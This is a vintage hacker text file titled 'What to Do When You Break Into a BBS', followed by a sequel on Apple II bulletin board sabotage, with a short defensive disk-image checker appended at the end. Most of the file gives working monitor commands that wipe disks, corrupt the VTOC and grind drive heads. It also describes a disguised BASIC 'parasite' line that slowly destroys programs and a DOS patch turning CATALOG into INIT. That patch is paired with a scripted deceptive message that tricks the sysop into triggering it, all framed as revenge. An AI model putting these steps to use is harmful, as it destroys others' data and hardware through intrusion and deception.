WHAT TO DO WHEN YOU BREAK INTO A BBS
====================================
BY -=> DOCTOR CRUNCH <=-

OK, YOU PROBABLY HAVE READ T-FILES ABOUT HOW TO BREAK INTO A BBS. SO, I WILL TELL YOU WHAT TO DO WHEN YOU GET INTO THE BBS.

MOST SYSOPS, IF THEY HAVE AN IQ, WILL DISABLE THE INIT COMMAND. THEY USUALLY DO THIS BY CHANGING THE INIT COMMAND TO SOME OTHER WORD YOU WILL NEVER GUESS. WELL, THERE IS AN EASIER WAY TO CRASH THE BBS THAN BY SEARCHING FOR WHAT THE SYSOP CHANGED IT TO. GET IN THE MONITOR (CALL-151), AND TYPE:

    A54FG

THIS IS THE INIT COMMAND'S ENTRY POINT, WHICH DOS CALLS TO INITIALIZE A DISK. THERE ARE SOME BUGS WITH THIS WAY OF CRASHING A DISK THOUGH:

1) IT TAKES ABOUT 40 SECONDS TO INIT A DISK, AND IF A SYSOP IS THERE, HE CAN STOP YOU AT ANY TIME.
2) MANY BOARDS USE A FAST DOS; AND, MOST FAST-DOSES HAD TO TAKE OUT THE INIT COMMAND TO MAKE THE MODS TO DOS. SO, EVEN IF YOU DO A A54FG, YOU WON'T BE ABLE TO KILL THE DISK.

I PREFER TO KILL THE VTOC, INSTEAD OF INITING THE DISK. HERE ARE A COUPLE OF REASONS WHY:

1) VERY QUICK!!!!!
2) VERY NASTY!!!!!

THE TRICK IS TO REWRITE THE VTOC (VOLUME TABLE OF CONTENTS) TO SAY THAT THE CATALOG TRACK IS 255. NOW ALL OF US KNOW THERE IS NO TRACK 255 ON A DISK. THIS CAN ONLY MEAN.....(YOU GUESSED IT) THAT THE SYSTEM WILL BOMB WHEN DOING ANYTHING THAT INVOLVES LOOKING AT THE CATALOG TRACK. SINCE ALMOST EVERYTHING YOU CAN DO IN DOS INVOLVES READING THE CATALOG TRACK, THIS WILL CRASH THE BBS QUITE WELL.

AND HERE IS A NICE LITTLE CATCH: YOU CAN REBOOT HIS DISK (WHICH WILL GIVE HIM AN I/O ERROR BECAUSE WHEN THE HELLO FILE IS RUN, DOS MUST LOOK AT THE CATALOG TRACK) AND LOGOFF AT THE SAME TIME. YOU SHOULD ALWAYS LOGOFF QUICKLY SO THAT THE SYSOP CAN'T LIFT UP THE PHONE, WHICH SOMETIMES WILL PREVENT YOU FROM HANGING UP. THE WAY I LOGOFF IS TO MAKE THE BBS I JUST CRASHED DO A RESET, CAUSING ME TO BE DISCONNECTED FROM THE OTHER END OF THE LINE.
SINCE MOST TERMINAL PROGRAMS HANG UP IF YOU LOSE THE CARRIER (WHICH WILL HAPPEN WHEN HIS SYSTEM RESETS), YOU WILL HANG UP THE SECOND YOU CRASH HIS SYSTEM!!!!

WELL, HERE IT IS: (BE SURE YOU'RE IN THE MONITOR)

    *B3BC:FF NAFFBG 3F4:00 NFA62G

IF YOU DON'T WANT TO LOGOFF,

    *B3BC:FF NAFFBG

NOTE: SOMETIMES YOU MAY HEAR A BEEP, THEN ALL OF YOUR MONITOR COMMANDS WILL FAIL. THIS IS BECAUSE OF A BUG IN DOS. WHEN RWTS LETS GO OF CONTROL, THE MONITOR VARIABLE $48 IS DESTROYED. TO WORK PROPERLY, $48 MUST BE RESTORED TO 0 BEFORE THE MONITOR TAKES CONTROL AGAIN. I MADE A SHORT ROUTINE THAT, WHEN CALLED, WRITES THE VTOC BUFFER TO THE DISK, AND SETS $48 TO 0. THE ROUTINE IS:

    300-   20 FB AF    JSR $AFFB
    303-   A9 00       LDA #$00
    305-   85 48       STA $48
    307-   60          RTS

SOMETIMES IT IS DESIRABLE TO CRASH THE DISKS IN DRIVE 1 AND DRIVE 2. THIS CAN BE DONE IN 1 LINE, INCLUDING THE QUICK LOGOFF:

    *300:20 FB AF A9 00 85 48 60 N B3BC:FF NB5F8:1 (DRV1) N300G B5F8:2 N300G 3F4:FF N FA62G

WELL, THAT'S ALL FOLKS!!! HAVE LOTS OF FUN......

==============
=>DR. CRUNCH<=
==============

-=*> P.S.

I WAS MESSING AROUND WITH DOS A COUPLE OF DAYS AGO AND I FIGURED OUT A REAL, REAL, REAL, NASTY ONE. YOU HAVE PROBABLY HEARD OF LETTING THE DRIVE SPIN FOR A COUPLE OF DAYS TO RUIN IT. THIS WORX, BUT IT TAKES A LONG TIME... I LIKE THIS 1 BETTER:

    *BDCC:EA EA NBDDA:EA EA

THIS MODS DOS TO RECALIBRATE THE DRIVE HEAD FOREVER (UNLESS THE SYSOP WALKS IN). SO, ALL YOU DO NOW IS USE A DOS COMMAND THAT READS THE DISK, AND THE DRIVE IS GOING TO MAKE A LOT OF FUNNY SOUNDS! CATALOG IS THE BEST ONE TO USE, SINCE IT IS IN ALMOST EVERY DOS UNMODIFIED.

=====
NOTE: THIS SHOULD ONLY BE DONE WHEN THERE IS A VERY, VERY, GOOD REASON TO WASTE SOME DUDE'S DRIVE. DON'T EVER DO THIS AS A PRANK, BECAUSE IT WORKS!
=====

ZATZ IT..

)>DR. CRUNCH<(

/\_________________________________________________________________________/\
\/                                                                         \/

BBS CRASHING: MORE NIFTY TRIX
*****************************
*       BY DR. CRUNCH       *
*>-------------------------<*
*) TYPED AND UPLOADED FOR: (*
*)   THE ASSASSIN'S KNOT   (*
*>-------------------------<*
*STONEHENGE(814)237-5635    *
*****************************

WELL, I HAD SUCH A FUN TYME PUTTING NIFTY STUFF IN MY LAST T-FILE, I DECIDED TO DO IT AGAIN. IN THIS FILE I WILL DISCUSS THE TYME BOMB, THE SNEAKY SPUD, AND THE BUGGER. THEY ALL ARE GREAT FOR REVENGE, GETTING EVEN, AND JUST BEING A PAIN IN THE A$$. WELL, I WON'T KEEP YOU SUSPENDED ANYMORE, HERE THEY ARE!

TYME BOMB
=========

THIS CRASH TAKES A LONG TIME TO WORK, BUT THERE IS ALMOST NO WAY TO DETECT IT. IT INVOLVES ADDING A LINE IN A COMMONLY USED PLACE, BUT NOT TOO COMMON. THAT MEANS, THE G-FILE SECTION OF A BBS IS A GOOD PLACE, BUT THE MAIN MENU IS NOT. ONCE YOU HAVE DECIDED WHERE TO PUT IT, FIND TWO FAT LINES IN THAT AREA. THESE LINES WILL BE THE DISGUISE LINES. YOU WILL PLACE A LINE BETWEEN THEM, AND THEY WILL CAMOUFLAGE IT (HOPEFULLY). NOW INSERT THIS LINE RIGHT AFTER THE FIRST DISGUISE LINE, AND BEFORE THE SECOND. LIKE THIS:

    10130 XXXXXXXX DISGUISE LINE XXXXXX
    10134 POKE INT(RND(1)*30000)+2053,0
    10140 XXXXXXXX DISGUISE LINE XXXXXX

THIS WILL, EVERY TIME IT HITS LINE 10134, POKE A RANDOM BYTE IN THE PROGRAM TO 0. ALL OF YOU APPLESOFT HACKERS OUT THERE SHOULD REMEMBER THAT APPLESOFT USES THE BYTE 0 TO SIGNAL THE END OF A LINE; MEANING: THE ENDS OF SOME LINES WILL START TO DISAPPEAR.

I PARTICULARLY LIKE THIS LITTLE TRICK BECUZ WHEN BUGS DO APPEAR IN THE PROGRAM, THEY ARE ALMOST NEVER NEAR THE LINE WE INSERTED. THE BUGS APPEAR SO SLOWLY THAT, BY THE TIME THEY ARE DISCOVERED, A BACKUP OF THE BBS PROGRAM CONTAINING OUR LITTLE LINE HAS USUALLY BEEN MADE. SO, WHEN THE SYSOP BEGINS TO USE HIS BACKUP COPY, OUR LITTLE BUG WILL AGAIN BEGIN TO GNAW AWAY AT THE HOST PROGRAM.

NOW LET'S GET SOME TERMS DOWN. A CRASH THAT IS INSERTED IN THE BBS AND SLOWLY DESTROYS IT IS CALLED A PARASITE. THE PROGRAM THE PARASITE IS KILLING IS CALLED THE HOST PROGRAM.
(SOUNDS LIKE BIOLOGY, EH?)

STEP BY STEP:

1) GET INTO THE BBS SOMEHOW.
2) FIND A COMMONLY USED PLACE, BUT NOT TOO COMMON.
3) INSERT THE PARASITE LINE BETWEEN TWO DISGUISE LINES.
4) BE SURE TO SAVE THE HOST PROGRAM AFTER THE PARASITE HAS BEEN PUT IN IT! IF YOU DON'T, WHEN THE HOST PROGRAM'S COMPUTER IS TURNED OFF, THE PARASITE WILL BE LOST.

======================================

SNEAKY SPUD

WHO WOULD A SYSOP LEAST EXPECT TO CRASH HIS BOARD? HIMSELF! THIS LITTLE CRASH INVOLVES MODIFYING DOS SO THAT WHEN THE DRIVE IS CATALOGED THE DISK IS INITIALIZED INSTEAD. NOW YOU COULD, YOURSELF, INITIALIZE THE DISK, BUT IT IS MUCH MORE FUN TO LET THE SYSOP DO IT FOR HIMSELF. WHY?

1) HE CAN'T FIND OUT WHO DID IT.
2) IF HE CRASHES HIS OWN BBS, HE WILL MAKE HIMSELF A COMPLETE ASS, AND YOU TORMENT HIM WITH THAT INFORMATION UNTIL HE CRIES!

LET'S SEE HOW THIS IS DONE.

1) GET INTO THE MONITOR.
2) TYPE "A56E:4C 4F A5"
3) EXIT TO BASIC (3D0G)
4) RERUN THE PROGRAM SO IT WILL LOG YOU OFF.
5) CALL THE BOARD BACK AND LOGON NEW UNDER SOME NAME LIKE: THE TIDY BOWL MAN OR FAT ALBERT OR UTAH JACK OR (WHO GIVES A DAMN?).
6) SEND HIM SOME FEEDBACK THAT WILL MAKE HIM CATALOG THE DISK. SUCH AS:

    EVERYTIME I TRY TO POST OR SEND MAIL TO A USER I GET THIS MESSAGE THEN I GET LOGGED OFF! I'M NOT SURE, BUT I THINK THAT YOUR DRIVE IS FULL. TO BE ON THE SAFE SIDE, TAKE A CATALOG OF THEM AND SEE IF THERE ARE MORE THAN 122 FILES. EVEN THOUGH YOU MAY HAVE FREE SECTORS, YOU MAY NOT HAVE ENOUGH ROOM IN THE CATALOG FOR MORE FILE NAMES. I HOPE YOU GET IT FIXED SOON!

    LAT0R0N MAN,
    S P U D   P E A L E R
    =======   ===========

7) LOGOFF.

NOW WHEN HE SEES YOUR MESSAGE AND TAKES A CATALOG HE WILL GET HIS DISK FRIED. HE WILL PROBABLY BE ABLE TO HIT RESET BEFORE THE DISK IS INITED COMPLETELY, BUT ENOUGH WILL BE ERASED TO SCREW HIM UP.

======================================

THE BUGGER

THIS ONE IS EASY. LOG ONTO A BOARD THAT IS EASY TO BREAK INTO AND DELETE SOME LINES OF YOUR CHOICE. THEN SAVE IT. DO THIS EVERY DAY OR SO FOR A MONTH.
AT THE END OF THE MONTH THE SYSOP WILL BE IN THE RUBBER ROOM SINGING JINGLE BELLS WHILE PLAYING A GAME OF HOPSCOTCH.

======================================

WELL, THAT WRAPS UP ANOTHER EXCITING EPISODE OF "CRASHING CHRONICLES". ZATZ ALL!

)>DR. CRUNCH<(
THE ELIMINATOR

<<*UPLOADED BY DE BUG*>>

Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
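
From the sysop's side, the VTOC damage described in the first file (catalog track set to 255) can be caught on a backup image before DOS ever hits the I/O error. The check below is an added example, not part of the original t-file: it assumes a 35-track, 16-sector DOS 3.3 image in DOS sector order, and the function names and the sample image are constructed for illustration.

```python
# Added example: sanity-check the VTOC and catalog chain of a DOS 3.3 image.
# Assumes a 35-track, 16-sector image stored in DOS sector order (.dsk/.do).
TRACKS, SECTORS, SIZE = 35, 16, 256
VTOC_TRACK, VTOC_SECTOR = 17, 0          # standard DOS 3.3 VTOC location


def offset(track, sector):
    """Byte offset of a sector inside the image."""
    return (track * SECTORS + sector) * SIZE


def check_image(image):
    """Return a list of findings; an empty list means the chain is sane."""
    if len(image) != TRACKS * SECTORS * SIZE:
        return ["unexpected image size"]
    findings = []
    vtoc = image[offset(VTOC_TRACK, VTOC_SECTOR):][:SIZE]
    if (vtoc[0x34], vtoc[0x35]) != (TRACKS, SECTORS):
        findings.append("VTOC geometry bytes are not 35 tracks x 16 sectors")
    track, sector = vtoc[0x01], vtoc[0x02]   # pointer to first catalog sector
    seen = set()
    while (track, sector) != (0, 0):         # 0/0 link ends the chain
        if track >= TRACKS or sector >= SECTORS:
            findings.append(f"catalog link T{track} S{sector} is off the disk")
            break
        if (track, sector) in seen:
            findings.append(f"catalog chain loops at T{track} S{sector}")
            break
        seen.add((track, sector))
        cat = image[offset(track, sector):][:SIZE]
        track, sector = cat[0x01], cat[0x02]  # link to next catalog sector
    if not seen and not findings:
        findings.append("VTOC points to no catalog sectors")
    return findings


def build_sample_image():
    """Constructed test data: blank disk with a standard VTOC and catalog."""
    img = bytearray(TRACKS * SECTORS * SIZE)
    v = offset(VTOC_TRACK, VTOC_SECTOR)
    img[v + 0x01], img[v + 0x02] = 17, 15    # catalog starts at T17 S15
    img[v + 0x34], img[v + 0x35] = TRACKS, SECTORS
    for s in range(15, 1, -1):               # S15 -> S14 -> ... -> S1
        c = offset(17, s)
        img[c + 0x01], img[c + 0x02] = 17, s - 1
    return img                               # S1 keeps link 0/0: end of chain


good = build_sample_image()
bad = build_sample_image()
bad[offset(VTOC_TRACK, VTOC_SECTOR) + 0x01] = 0xFF   # catalog track 255, as in the text
print(check_image(bytes(good)), check_image(bytes(bad)))
```

Run it against nightly images of the BBS disks; restoring byte $01 of the VTOC to the real catalog track (17 on a standard disk) undoes this particular damage, since nothing else on the disk was overwritten.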